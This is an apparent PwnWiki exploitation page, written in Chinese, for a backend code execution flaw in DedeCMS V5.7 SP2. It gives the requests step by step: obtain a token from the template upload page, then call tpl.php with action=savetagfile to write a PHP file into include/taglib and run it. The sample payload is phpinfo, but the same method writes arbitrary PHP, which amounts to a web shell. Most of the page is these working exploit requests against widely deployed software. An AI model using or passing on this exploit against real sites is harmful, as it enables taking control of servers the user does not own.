DedeCMS V5.7 SP2 後台代碼執行漏洞

From PwnWiki
Other languages:
Chinese • ‎português • ‎中文(台灣)‎

漏洞利用

首先獲取token: domain + /dede/tpl.php?action=upload

通過查看頁面源碼即可獲得 token 

http://127.0.0.1/uploads/dede/tpl.php?action=upload

Token.png

然後訪問: 

http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=<TOKEN>

Shell

http://127.0.0.1/include/taglib/secnote.lib.php
Retrieved from "https://pwnwiki.com/index.php?title=DedeCMS_V5.7_SP2_後台代碼執行漏洞&oldid=1349"